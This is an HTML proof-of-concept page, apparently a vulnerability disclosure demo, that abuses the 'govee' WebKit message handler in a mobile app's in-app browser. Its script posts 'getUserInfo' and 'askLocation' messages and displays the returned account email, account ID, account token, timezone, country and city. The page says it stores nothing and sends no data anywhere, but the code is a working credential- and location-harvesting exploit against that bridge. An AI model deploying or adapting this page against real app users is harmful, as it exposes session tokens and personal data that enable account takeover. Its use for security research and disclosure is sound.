<!DOCTYPE html>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" charset="UTF-8">
    <style>
        body {
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }

        .container {
            width: 100%;
            padding: 15px;
        }

        @media screen and (min-width: 700px) {
            .container {
                width: 70%;
                margin: auto;
            }
        }

        p {
            white-space: pre-wrap; 
            word-wrap: break-word; 
            overflow-wrap: break-word; 
        }

        .bold-and-larger {
            font-weight: bold; 
            font-size: 1.5em; 
        }

        .larger {
            font-weight: bold; 
            font-size: 1.2em; 
        }

    </style>
    <title>Malicious Page</title>

</head>


<body>
    <h1>Malicious Page</h1>

    <p>!!! This is just a demo page, NO Sensitive Data will be stored!!!</p>

    <p><span class="bold-and-larger">An attacker can:</span></p>

    <p><span class="larger">Get Your Account Info:</span></p>
    <p style="font-size: 15px;" id="AccountEMail"></p>
    <p style="font-size: 15px;" id="AccountID"></p>
    <p style="font-size: 15px;" id="AccountToken"></p>
    <p style="font-size: 15px;" id="Timezone"></p>

    <p><span class="larger">Get Your Geolocation Info:</span></p>
    <p style="font-size: 15px;" id="Country"></p>
    <p style="font-size: 15px;" id="City"></p>
    <p style="font-size: 15px;" id="CountryCode"></p>


    <br><br>
    <script>
    window.onCallBack = function(res){
        var json = res;
        var callback_id = json.callBack;

        switch(callback_id){
            case "cb_getUserInfo":
                document.getElementById("AccountEMail").innerText = "Your Account EMail: " + json.result.accountEmail;
                document.getElementById("AccountID").innerText = "Your AccountID: " + json.result.accountId;
                document.getElementById("AccountToken").innerText = "Your Account Token: \n" + json.result.accountToken;
                document.getElementById("Timezone").innerText = "Your Timezone: " + json.result.timezone;
                break;
        }
    };

    window.notifyFromApp = function(res){
        var json = res;
        var event_name = json.eventName;
        
        switch(event_name){
            case "notifyLocationInfo":
                document.getElementById("Country").innerText = "Your Country: " + json.data.country;
                document.getElementById("City").innerText = "Your City: " + json.data.city;
                document.getElementById("CountryCode").innerText = "Your Country Code: " + json.data.countryCode;
                break;
        }
    };

    window.webkit.messageHandlers.govee.postMessage({
        "callBack":"cb_getUserInfo",
        "keyName":"getUserInfo",
        "optParams":{}
    });

    window.webkit.messageHandlers.govee.postMessage({
        "callBack":"cb_askLocation",
        "keyName":"askLocation",
        "optParams":{}
    });
    
    </script>

</body>

</html>